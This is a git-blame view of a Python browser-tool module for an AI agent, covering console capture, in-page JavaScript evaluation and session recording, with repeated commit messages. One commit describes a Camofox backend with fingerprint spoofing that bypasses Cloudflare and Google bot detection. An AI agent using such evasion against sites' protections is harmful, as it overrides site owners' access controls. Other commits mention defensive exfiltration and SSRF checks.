4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
Returns :
2026-04-05 12:42:52 -07:00
JSON string with console messages / errors , or eval result
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
"""
2026-04-05 12:42:52 -07:00
# --- JS evaluation mode ---
if expression is not None :
return _browser_eval ( expression , task_id )
# --- Console output mode (original behaviour) ---
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_console
return camofox_console ( clear , task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
console_args = [ " --clear " ] if clear else [ ]
error_args = [ " --clear " ] if clear else [ ]
2026-03-14 11:34:31 -07:00
console_result = _run_browser_command ( effective_task_id , " console " , console_args )
errors_result = _run_browser_command ( effective_task_id , " errors " , error_args )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
messages = [ ]
if console_result . get ( " success " ) :
for msg in console_result . get ( " data " , { } ) . get ( " messages " , [ ] ) :
messages . append ( {
" type " : msg . get ( " type " , " log " ) ,
" text " : msg . get ( " text " , " " ) ,
" source " : " console " ,
} )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
errors = [ ]
if errors_result . get ( " success " ) :
for err in errors_result . get ( " data " , { } ) . get ( " errors " , [ ] ) :
errors . append ( {
" message " : err . get ( " message " , " " ) ,
" source " : " exception " ,
} )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
return json . dumps ( {
" success " : True ,
" console_messages " : messages ,
" js_errors " : errors ,
" total_messages " : len ( messages ) ,
" total_errors " : len ( errors ) ,
} , ensure_ascii = False )
2026-04-05 12:42:52 -07:00
def _browser_eval ( expression : str , task_id : Optional [ str ] = None ) - > str :
""" Evaluate a JavaScript expression in the page context and return the result. """
if _is_camofox_mode ( ) :
return _camofox_eval ( expression , task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-04-05 12:42:52 -07:00
result = _run_browser_command ( effective_task_id , " eval " , [ expression ] )
if not result . get ( " success " ) :
err = result . get ( " error " , " eval failed " )
# Detect backend capability gaps and give the model a clear signal
if any ( hint in err . lower ( ) for hint in ( " unknown command " , " not supported " , " not found " , " no such command " ) ) :
return json . dumps ( {
" success " : False ,
" error " : f " JavaScript evaluation is not supported by this browser backend. { err } " ,
} )
return json . dumps ( {
" success " : False ,
" error " : err ,
} )
data = result . get ( " data " , { } )
raw_result = data . get ( " result " )
# The eval command returns the JS result as a string. If the string
# is valid JSON, parse it so the model gets structured data.
parsed = raw_result
if isinstance ( raw_result , str ) :
try :
parsed = json . loads ( raw_result )
except ( json . JSONDecodeError , ValueError ) :
pass # keep as string
return json . dumps ( {
" success " : True ,
" result " : parsed ,
" result_type " : type ( parsed ) . __name__ ,
} , ensure_ascii = False , default = str )
def _camofox_eval ( expression : str , task_id : Optional [ str ] = None ) - > str :
""" Evaluate JS via Camofox ' s /tabs/ {tab_id} /eval endpoint (if available). """
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
from tools . browser_camofox import _ensure_tab , _post
2026-04-05 12:42:52 -07:00
try :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
tab_info = _ensure_tab ( task_id or " default " )
tab_id = tab_info . get ( " tab_id " ) or tab_info . get ( " id " )
2026-04-14 10:21:54 -07:00
resp = _post ( f " /tabs/ { tab_id } /evaluate " , body = { " expression " : expression , " userId " : tab_info [ " user_id " ] } )
2026-04-05 12:42:52 -07:00
# Camofox returns the result in a JSON envelope
raw_result = resp . get ( " result " ) if isinstance ( resp , dict ) else resp
parsed = raw_result
if isinstance ( raw_result , str ) :
try :
parsed = json . loads ( raw_result )
except ( json . JSONDecodeError , ValueError ) :
pass
return json . dumps ( {
" success " : True ,
" result " : parsed ,
" result_type " : type ( parsed ) . __name__ ,
} , ensure_ascii = False , default = str )
except Exception as e :
error_msg = str ( e )
# Graceful degradation — server may not support eval
if any ( code in error_msg for code in ( " 404 " , " 405 " , " 501 " ) ) :
return json . dumps ( {
" success " : False ,
" error " : " JavaScript evaluation is not supported by this Camofox server. "
" Use browser_snapshot or browser_vision to inspect page state. " ,
} )
refactor: add tool_error/tool_result helpers + read_raw_config, migrate 129 callsites
Add three reusable helpers to eliminate pervasive boilerplate:
tools/registry.py — tool_error() and tool_result():
Every tool handler returns JSON strings. The pattern
json.dumps({"error": msg}, ensure_ascii=False) appeared 106 times,
and json.dumps({"success": False, "error": msg}, ...) another 23.
Now: tool_error(msg) or tool_error(msg, success=False).
tool_result() handles arbitrary result dicts:
tool_result(success=True, data=payload) or tool_result(some_dict).
hermes_cli/config.py — read_raw_config():
Lightweight YAML reader that returns the raw config dict without
load_config()'s deep-merge + migration overhead. Available for
callsites that just need a single config value.
Migration (129 callsites across 32 files):
- tools/: browser_camofox (18), file_tools (10), homeassistant (8),
web_tools (7), skill_manager (7), cronjob (11), code_execution (4),
delegate (5), send_message (4), tts (4), memory (7), session_search (3),
mcp (2), clarify (2), skills_tool (3), todo (1), vision (1),
browser (1), process_registry (2), image_gen (1)
- plugins/memory/: honcho (9), supermemory (9), hindsight (8),
holographic (7), openviking (7), mem0 (7), byterover (6), retaindb (2)
- agent/: memory_manager (2), builtin_memory_provider (1)
2026-04-07 13:36:20 -07:00
return tool_error ( error_msg , success = False )
2026-04-05 12:42:52 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
def _maybe_start_recording ( task_id : str ) :
""" Start recording if browser.record_sessions is enabled in config. """
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
with _cleanup_lock :
if task_id in _recording_sessions :
return
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
2026-04-03 12:32:10 -07:00
hermes_home = get_hermes_home ( )
2026-04-07 17:28:04 -07:00
cfg = read_raw_config ( )
record_enabled = cfg . get ( " browser " , { } ) . get ( " record_sessions " , False )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
if not record_enabled :
return
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
recordings_dir = hermes_home / " browser_recordings "
recordings_dir . mkdir ( parents = True , exist_ok = True )
_cleanup_old_recordings ( max_age_hours = 72 )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
